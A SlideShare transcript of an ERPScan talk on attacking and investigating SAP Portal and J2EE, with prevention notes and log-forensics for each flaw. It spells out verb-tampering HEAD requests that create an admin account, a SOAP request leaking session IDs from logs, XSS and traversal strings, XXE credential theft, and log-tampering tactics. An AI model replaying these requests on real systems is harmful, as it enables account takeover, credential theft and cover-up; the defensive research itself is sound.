SlideShare ist ein Scribd-Unternehmen logo

SAP portal: breaking and forensicating

ERPScan
ERPScan
Software
1 von 87
Downloaden Sie, um offline zu lesen
Invest  in  security   to  secure  investments   SAP  Portal:  Hacking   and  forensics   Dmitry  Chastukhin  –  Director  of  SAP  pentest/research  team   Evgeny  Neyolov  –  Security  analyst,  (an@)forensics  research  
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu=on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta@ons  key  security  conferences  worldwide   •  25  Awards  and  nomina@ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
Agenda   •  SAP  security   •  SAP  forensics  WTF?!   •  Say  hello  to  SAP  Portal   •  Breaking  SAP  Portal   •  Catch  me  if  you  can   •  Conclusion   3  
SAP   •  The  most  popular  business  applica=on   •  More  than  180000  customers  worldwide     •  More  than  70%  of  Forbes  500  run  SAP   •  More  than  40%  of  ERP  market  in  Poland   4  
SAP  security   Espionage   •  Stealing  financial  informa=on   •  Stealing  corporate  secrets   •  Stealing  supplier  and  customer  lists   •  Stealing  HR  data   Fraud   •  False  transac=ons   •  Modifica=on  of  master  data   Sabotage   •  Denial  of  service   •  Modifica=on  of  financial  reports   •  Access  to  technology  network  (SCADA)  by  trust  rela=ons   5  
0   5   10   15   20   25   30   35   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   SAP  security   6   •  BlackHat   •  Defcon     •  HITB     •  RSA     •  CONFidence   •  DeepSec     •  Hack=vity   •  Troopers     •  Source   Source:  SAP  Security  in  Figures  2013   LINK  
Is  it  remotely  exploitable?       5000+    non-­‐web  SAP  services  exposed  in  the  world    including  Dispatcher,  Message  server,  SapHostControl,  etc.     7   sapscan.com  
8   0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014   By  2014    -­‐  2800  SAP  Security  notes   SAP  Security  notes  
What  about  other  services?   0 1 2 3 4 5 6 7 8 9 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd World 9  
What  about  unpublished  threats?   •  Companies  are  not  interested  in  publishing  informa=on  about   their  breaches   •  There  are  a  lot  of  internal  breaches  thanks  to  unnecessarily   given  authoriza=ons  (An  employee  by  mistake  buys  hundreds  of   excavators  instead  of  ten)   •  There  are  known  stories  about  backdoors  leb  by  developers  in   custom  ABAP  code   •  How  can  you  be  sure  that,  if  a  breach  occurs,  you  can  find   evidence?   10  
If  there  are  no  acacks,  it  doesn’t  mean  anything     •  Companies  don’t  like  to  share  it   •  Companies  don’t  use  security  audit  ~10%   •  Even  if  used,  nobody  manages  it  ~5%   •  Even  if  managed,  no  correla=on  ~1%   SAP  Forensics   11  
Typical  SAP  audit  op@ons     •  ICM  log  icm/HTTP/logging_0    70%     •  Security  audit  log  in  ABAP    10%   •  Table  access  logging  rec/client    4%   •  Message  Server  log  ms/audit    2%   •  SAP  Gateway  access  log      2%   *  The  percentage  of  companies  is  based  on  our  security  assessments  and  product   implementa7ons.   12  
What  do  we  see?   •  A  lot  of  research   •  Real  acacks   •  Lack  of  logging  prac=ce   •  Many  vulnerabili=es  are  hard  to  close  →  We  need  to  monitor   them,  at  least             13  
What  do  we  need  to  monitor?     External  a_acks  on  SAP   14   *  Ideally,  we  should  control  everything,  but  this  talk  has  limits,  so  let’s  focus  on   the  most  cri7cal  areas.   • Awareness   Acack  users   and  SAP  GUI   • Secure configuration and patch management  SAProuter   • Disable them   Exposed  SAP   services     • Too  much  issues  and  custom  configura=on   • Can  be  0-­‐days   • Need  to  concentrate  on  this  area     SAP  Portal   and  WEB    
•  Point  of  web  access     to  SAP  systems     •  Point  of  web  access  to     other  corporate  systems   •  Way  for  acackers     to  get  access  to  SAP     from  the  Internet   Say  hello  to  Portal   15  
EP  architecture   16  
Okay,  okay.  SAP  Portal  is  important,  and   it  has  many  links  to  other  modules.     So  what?   17  
SAP  Logging   “If  you  are  running  an  ABAP  +  Java  installa7on  of  Web  AS  with   SAP  Web  Dispatcher  as  a  load  balancing  solu7on,  you  can  safely   disable  logging  of  HTTP  requests  and  responses  on  J2EE  Engine,   and  use  the  corresponding  CLF  logs  of  SAP  Web  Dispatcher.  This   also  improves  the  HTTP  communica7on  performance.  The  only   drawback  of  using  the  Web  Dispatcher’s  CLF  logs  is  that  no   informa4on  is  available  about  the  user  execu4ng  the  request   (since  the  user  is  not  authen7cated  on  the  Web  Dispatcher,  but   on  the  J2EE  Engine  instead).“   SOURCE:  SAP  HELP     *Not  the  only….  There  are  many  complex  aTacks  with  POST  requests.   18  
SAP  J2EE  Logging   •  Categories  of  system  events  recording:   –  System  –  all  system  related  security  and  administra=ve  logs   –  Applica=ons  –  all  system  events  related  to  business  logic   –  Performance  –  reserved  for  single  ac=vity  tracing     •  Default  loca=on  of  these  files  in  your  file  system:  usrsap <sid><id>j2eecluster<node>log 19  
SAP  J2EE  Logging   •  The  developer  trace  files  of  the  Java  instance   <SID><instance name>work •  The  developer  trace  files  of  the  central  services   <SID><instance name>work <SID><instance name>log •  Java  server  logs   <SID><instance name>j2eeclusterserver<n>log 20  
Full  logging  is  not  always  the  best  op@on   •  21  
SAP  Management  Console   22  
SAP  Management  Console   •  SAP  MMC:  centralized  system  management   •  SAP  MMC  has  remote  commands   •  Commands  are  simple  SOAP  requests   •  Allowing  to  see  the  trace  and  log  messages   •  It’s  not  bad  if  you  only  use  it  some=mes  and  delete  logs  aber   use,  but…   23  
SAP  Management  Console           24   What  can  we  find  in  logs?   Right!   The  file  userinterface.log  contains  calculated  JSESIONID   But…   The  acacker  must  have  creden=als  to  read  the  log  file   WRONG!  
SAP  Management  Console   25   <?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/ envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/ features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/userinterface.log</ filename> <filter/> <language/> <maxentries>%COUNT%</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
Preven@on   26   LINK  to  SAP  HELP   •  Don’t  use  TRACE_LEVEL  =  3   •  Delete  traces  when  work  is  finished   •  Limit  access  to  dangerous  methods   •  Install  notes  927637  and  1439348   •  Mask  security-­‐sensi@ve  data  in  HTTP  access  log    
Preven@on   27   LINK  to  SAP  HELP   •  The  HTTP  Provider  service  can  mask  security-­‐ sensi=ve  URL  parameters,  cookies,  or  headers         •  By  default,  only  for  the  headers  listed  below   –  Path  Parameter:  jsessionid   –  Request  Parameters:  j_password,    j_username,   j_sap_password,  j_sap_again,  oldPassword,   confirmNewPassword,=cket   –  HTTP  Headers:  Authoriza=on,  Cookie  (JSESSIONID,   MYSAPSSO2)  
SAP  NetWeaver  J2EE   28  
Access  Control     •   Web  Dynpro    -­‐  programma=c   •   Portal  iViews    -­‐  programma=c   •   J2EE  Web  apps    -­‐  declara=ve   29   Programma@c     By  UME   Declara@ve       By  WEB.XML  
Access  Control   •  The  central  en=ty  in  the  J2EE  authoriza=on  model  is  the  security   role   •  Programmers  define  the  applica=on-­‐specific  roles  in  the  J2EE   deployment  descriptor   30   web.xml      web-­‐j2ee-­‐engine.xml  
web.xml   <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>administrator</role-name> </auth-constraint> </security-constraint> 31   Verb  Tampering  
Verb  Tampering     •  If  we  are  trying  to  get  access  to  an  applica=on  using  GET  –  we   need  a  login:pass  and  administrator  role   •  What  if  we  try  to  get  access  to  applica=on  using  HEAD  instead   GET?   •  PROFIT!   •  Did  U  know  about  ctc?   32  
Verb  Tampering     Need  Admin  account  in  SAP  Portal?     Just  send  two  HEAD  requests     •  Create  new  user  CONF:idence   HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig; CREATEUSER;USERNAME=CONF,PASSWORD=idence     •  Add  the  user  CONF  to  the  group  Administrators   HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig; ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators     *  Works  when  UME  uses  JAVA  database.       33  
•  Install  SAP  notes  1503579,  1616259,  1589525,   1624450   •  Install  other  SAP  notes  about  Verb  Tampering       •  Scan  applica=ons  with  ERPScan  WEB.XML  checker     •  Disable  the  applica=ons  that  are  not  necessary     Preven@on   34  
Inves@ga@on   [Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET / ctc/ConfigServlet HTTP/1.1 401 1790 [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD / ctc/ConfigServlet HTTP/1.1 200 0 [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD / ctc/ConfigServlet? param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME= CONF,PASSWORD=idence HTTP/1.0 200 0 j2eecluster<node>logsystemhttpaccess responses.trc 35  
web.xml   <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet- class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> <http-method>HEAD</http-method> </web-resource-collection> <auth-constraint> <role-name>administrator</role-name> </auth-constraint> </security-constraint> 36   GET  /admin/cri=cal/Cri7calAc7on   GET  /servlet/com.sap.admin.Cri=cal.Ac=on   Invoker  servlet  
Invoker  Servlet   •  Want  to  execute  an  OS  command  on  J2EE  server  remotely?   •  Maybe  upload  a  backdoor  in  a  Java  class?   •  Or  sniff  all  traffic?   S=ll  remember  ctc?   37  
Invoker  Servlet               38  
Preven@on   39   •  Update  to  the  latest  patch  1467771,  1445998     •  “EnableInvokerServletGlobally”    must  be  “false”       •  Check  all  WEB.XML  files  with  ERPScan  WEBXML   checker    
Inves@ga@on            #1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352 03#/System/Security/Audit#sap.com/ tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit #Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/ a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[ impl: 3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain# ##Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]# #1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420 62#/System/Security/Audit/J2EE#sap.com/ irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/ a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_ Application_Thread[impl: 3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audi t#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests# 40  
Inves@ga@on   41  
XSS   •  Many  XSSs  in  Portal   •  But  some=mes  HcpOnly   •  But  when  we  exploit  XSS,  we  can  use  the  features  of  SAP  Portal   42   EPCF  
EPCF   •  EPCF  provides  a  JavaScript  API  designed  for  the  client-­‐side   communica=on  between  portal  components  and  the  portal   core  framework   •  Enterprise  Portal  Client  Manager  (EPCM)   •  iViews  can  access  the  EPCM  object  from  every  portal  page   or  IFrame   •  Every  iView  contains  the  EPCM  object   <SCRIPT> alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"); </SCRIPT> 43   For  example,  EPCF  used  for  transient  user  data  buffer  for  iViews  
Preven@on   44   •   Install  SAP  note  1656549  
Inves@ga@on   #Plain###192.168.192.26 : GET /irj/servlet/ prt/portal/prtroot/ com.sap.portal.usermanagement.admin.UserMappi ng?systemid=MS_EXCHANGEaaaa%3C/script%3E %3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968# j2eecluster<node>logsystemhttpaccess responses.trc 45  
Web  Dynpro  JAVA   •  Web  Dynpro  unauthorized  modifica=ons     •  For  example:   –  somebody  steals  an  account  using  XSS/CSRF/Sniffing   –  then  tries  to  modify  the  severity  level  of  logs   46  
Web  Dynpro  JAVA   47   LINK  to  SAP  HELP  
Inves@ga@on   •   No  traces  of  change  in  default  log  files   clusterserver0logsystemhttpaccessresponses.log •   Web  Dynpro  sends  all  data  by  POST,  and  we  only  see  GET  URLs  in   responses.log     •   But  some=mes  we  can  find  informa=on  by  indirect  signs   [Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET / webdynpro/resources/sap.com/ tc~lm~webadmin~log_config~wd/Components/ com.sap.tc.log_configurator.LogConfigurator/ warning.gif HTTP/1.1 200 110 •  The  client  loaded  images  from  the  server  during  some  changes   48  
Inves@ga@on   •  Most  ac=ons  have  icons     •  They  have  to  be  loaded  from  the  server     •  Usually,  legi=mate  users  have  them  all  in  cache   •  Acackers  usually  don’t  have  them,  so  they  make  requests  to  the   server   •  That’s  how  we  can  iden=fy  poten=ally  malicious  ac=ons   •  But  there  should  be  correla=on  with  a  real  user’s  ac=vity   •  False  posi=ves  are  possible:   –  New  legi=mate  user     –  Old  user  clears  cache   –  Other     49  
Directory  traversal   50   FIX  
Directory  traversal  fix  bypass   51  
Preven@on   52   •   Install  SAP  note  1630293  
Inves@ga@on   /../ !252f..!252f 53  
Breaking  SAP  Portal   •  Found  a  file  in  the  OS  of  SAP  Portal  with  the  encrypted   passwords  for  administra=on  and  DB   •  Found  a  file  in  the  OS  of  SAP  Portal  with  keys  to  decrypt   passwords   •  Found  a  vulnerability  (another  one  ;))  which  allows  reading  the   files  with  passwords  and  keys   •  Decrypt  passwords  and  log  into  Portal   •  PROFIT!   54  
Read  the  file   How  can  we  read  the  file?     •  Directory  Traversal   •  OS  Command  execu=on     •  XML  External  En=ty  (XXE)   55  
XXE  in  Portal:  Details   •   Injec=on  of  malicious  requests  into  XML  packets   •   Can  lead  to  unauthorized  file  read,  DoS,  SSRF     •   There  is  an  XXE  vulnerability  in  SAP  Portal   •   Can  be  exploited  by  modifica=on  of  POST  request   •   It  is  possible  to  read  any  file  from  OS  and  much  more   56  
XXE  in  Portal           57  
XXE  in  Portal           58  
XXE   59   Error  based  XXE  
XXE  in  Portal:  Result     •  We  can  read  any  file   •  Including  config  with  passwords   •  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB;  its   password  is  here:   usrsap<SID>SYSglobalsecuritydataSecStore.properties 60  
rdbms.maximum_connections=5 system.name=TTT secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/ data/SecStore.key secstorefs.secfile=/oracle/TTT/sapmnt/global/security/ data/SecStore.properties secstorefs.lib=/oracle/TTTsapmnt/global/security/lib rdbms.driverLocation=/oracle/client/10x_64/ instantclient/ojdbc14.jar rdbms.connection=jdbc/pool/TTT rdbms.initial_connections=1 Where  are  the  passwords?   (config.proper4es)   61  
rdbms.maximum_connections=5 system.name=TTT secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/ data/SecStore.key secstorefs.secfile=/oracle/TTT/sapmnt/global/security/ data/SecStore.properties secstorefs.lib=/oracle/TTTsapmnt/global/security/lib rdbms.driverLocation=/oracle/client/10x_64/ instantclient/ojdbc14.jar rdbms.connection=jdbc/pool/TTT rdbms.initial_connections=1 Where  are  the  passwords?     (config.proper4es)   62  
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u +14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS admin/password/TTT=7KJuOPPs/+uv +14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh jdbc/pool/TTT=7KJuOPPs/ +u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH admin/port/TTT=7KJuOPPs/+u +1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ $internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt $internal/mode=encrypted admin/user/TTT=7KJuOPPs/+u +14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E SecStore.proper@es   63   But  where  is  the  key?  
rdbms.maximum_connections=5 system.name=TTT secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/ data/SecStore.key secstorefs.secfile=/oracle/TTT/sapmnt/global/security/ data/SecStore.properties secstorefs.lib=/oracle/TTTsapmnt/global/security/lib rdbms.driverLocation=/oracle/client/10x_64/ instantclient/ojdbc14.jar rdbms.connection=jdbc/pool/TTT rdbms.initial_connections=1 config.proper@es   64  
Get  the  password   •  We  have  an  encrypted  password   •  We  have  a  key  to  decrypt  it   We  got  the  J2EE  admin  and  JDBC   login:password!   65  
Preven@on   66   •   Install  SAP  note  1619539   •   Restrict  read  access  to  files  SecStore.proper7es  and   SecStore.key  
Inves@ga@on   POST /irj/servlet/prt/portal/prteventname/ HtmlbEvent/prtroot/pcd!3aportal_content! 2fadministrator!2fsuper_admin! 2fsuper_admin_role! 2fcom.sap.portal.content_administration! 2fcom.sap.portal.content_admin_ws! 2fcom.sap.km.AdminContent! 2fcom.sap.km.AdminContentExplorer! 2fcom.sap.km.AdminExplorer/ HTTP/1.1 67  
Inves@ga@on   •  The  only  one  way  to  get  HTTP  POST  request  values  is  to  enable   HTTP  Trace   •  Visual  Administrator  →  Dispatcher  →  HTTP  Provider   →  Proper=es:  HcpTrace  =  enable   •  For  6.4  and  7.0  SP12  and  lower:     –  On  Dispatcher:     /j2ee/cluster/dispatcher/log/defaultTrace.trc –  On  Server       j2eeclusterserver0logsystemhttpaccessresponses.0.trc •   For  7.0  SP13  and  higher:   /j2ee/cluster/dispatcher/log/services/http/req_resp.trc   •  Manually  analyze  all  requests  for  XXE  acacks   68  
Malicious  file  upload:  A_ack   •  Knowledge  management  allows  uploading  to  the  server   different  types  of  files  that  can  store  malicious  content   •  Some=mes,  if  guest  access  is  allowed,  it  is  possible  to  upload   any  file  without  being  an  authen=cated  user   •  For  example,  it  can  be  an  HTML  file  with  JavaScript  that  steals   cookies   69  
Malicious  file  upload:  A_ack   70  
Malicious  file  upload:  A_ack   71  
Malicious  file  upload:  Forensics   [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST / irj/servlet/prt/portal/prteventname/HtmlbEvent/ prtroot/pcd!3aportal_content!2fspecialist! 2fcontentmanager!2fContentManager! 2fcom.sap.km.ContentManager! 2fcom.sap.km.ContentExplorer! 2fcom.sap.km.ContentDocExplorer! 2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968 [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET / irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165   *Again,  images  can  help  us.   72  
Malicious  file  upload:  Preven@on   73   Enable  File  Extension  and  Size  Filter:   •  System  Administra7on  →  System  Configura7on  →  Content   Management  →    Repository  →  Filters  →  Show  Advanced   Op7ons  →  File  Extension  and  Size  Filter     •  Select  either  the  All  repositories  parameter  or  at  least  one   repository  from  the  repository  list  in   the  Repositories  parameter  
Malicious  file  upload:  Preven@on   74   Enable  Malicious  Script  Filter:   •  System  Administra7on  →  System  Configura7on  →  Content   Management  →    Repository  →  Filters  →  Show  Advanced   Op7ons  →  Malicious  Script  Filter     •  The  filter  also  detects  executable  scripts  in  files  that  are   being  modified  and  encodes  them  when  they  are  saved   –  enable  Forbidden  Scripts.  Comma-­‐separated  list  of  banned  script   tags  that  will  be  encoded  when  the  filter  is  applied   –  enable  the  Send  E-­‐Mail  to  Administrator  op@on  
Portal  post-­‐exploita@on   •  Lot  of  links  to  other  systems  in  corporate  LAN   •  Using  SSRF,  acackers  can  get  access  to  these  systems   What  is  SSRF?   75  
•  We  send  Packet  A  to  Service  A   •  Service  A  ini=ates  Packet  B  to  service  B   •  Services  can  be  on  the  same  or  different  hosts   •  We  can  manipulate  some  fields  of  packet  B  within  packet  A   •  Various  SSRF  acacks  depend  on  how  many  fields  we  can  control   on  packet  B     76   Packet  A   Packet  B   SSRF  History:  Basics  
77   HTTP  Server    Corporate   network   Direct  acack      GET  /vuln.jsp     SSRF  Acack     SSRF  Acack     Get  /vuln.jst     A   B   Par@al  Remote  SSRF:     HTTP  a_acks  on  other  services  
Gopher  uri  scheme   •  Using  gopher://  uri  scheme,  it  is  possible  to  send  TCP   packets   –   Exploit  OS  vulnerabili=es   –   Exploit  old  SAP  applica@on  vulnerabili@es     –   Bypass  SAP  security  restric=ons   –   Exploit  vulnerabili=es  in  local  services     More  info  in  our  BH2012  presenta=on:   SSRF  vs.  Business  Cri7cal  Applica7ons   LINK   78  
Portal  post-­‐exploita@on   79  
An@-­‐forensics   80  
An@-­‐forensics   •  Flooding   •  Dele=ng   •  Changing   81  
An@-­‐forensics   Log  flooding   •  5  ac=ve  logs   •  Maximum  log  file  size  is  10  Mb   •  Archiving  when  all  logs  reach  the  maximum  size   •  If  file.0.log  -­‐>  max  size  then  open  file.1.log   •  If  file.4.log  -­‐>  max  size  then  zip  all  and  backup   •  Rewri=ng  the  same  files  aber  archiving   82  
An@-­‐forensics   Log  dele@ng   •  SAP  locks  write  access  to  the  only  one  ac=ve  log   •  SAP  allows  reading/wri=ng  logs,  so  it  is  possible  to  delete  them   •  It  could  compromise  the  acacker’s  presence   Log  changing   •  SAP  locks  write  access  only  to  the  one  ac=ve  log   •  It  is  possible  to  write  into  any  other  log  file     83  
Securing  SAP  Portal   •  Patching   •  Secure  configura=on   •  Enabling  HTTP  Trace  with  masking   •  Malicious  script  filter   •  Log  archiving   •  Addi=onal  place  for  log  storage   •  Monitoring  of  security  events   –  Own  scripts,  parse  common  pacerns   –  ERPScan  has  all  exis=ng  web  vulns/0-­‐day  pacerns   84  
It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure   SAP  guides   It’s  all  in  your  hands   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   Segrega@on  of  du@es   85   Conclusion  
 I'd  like  to  thank  SAP's  Product  Security  Response  Team  for  the   great  coopera7on  to  make  SAP  systems  more  secure.  Research   is  always  ongoing,  and  we  can't  share  all  of  it  today.  If  you  want   to  be  the  first  to  see  new  aTacks  and  demos,  follow  us  at   @erpscan  and  aTend  future  presenta7ons:   July  31  –  BlackHat  (Las  Vegas,  USA)   86   Future  work  
Web:                      www.erpscan.com   e-­‐mail:        info@erpscan.com                                     Twicer:     @erpscan   @_chipik   @neyolov   87  

Empfohlen

Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
ERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
ERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
ERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
ERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 

Empfohlen

Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
ERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
ERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
ERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
ERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
PROIDEA
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
ERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
ERPScan
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP Systems
Onapsis Inc.
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
Onapsis Inc.
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Onapsis Inc.
 
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe... Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
Onapsis Inc.
 
How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the Jewels
Onapsis Inc.
 
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsBlended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory Platforms
Onapsis Inc.
 
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
Onapsis Inc.
 
Attacks Based on Security Configurations
Attacks Based on Security ConfigurationsAttacks Based on Security Configurations
Attacks Based on Security Configurations
Onapsis Inc.
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis Inc.
 
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsPreventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
Onapsis Inc.
 
Open APIs Design
Open APIs DesignOpen APIs Design
Open APIs Design
Isabelle Mauny
 
Netherlands Tech Tour - 06 MySQL Enterprise Monitor
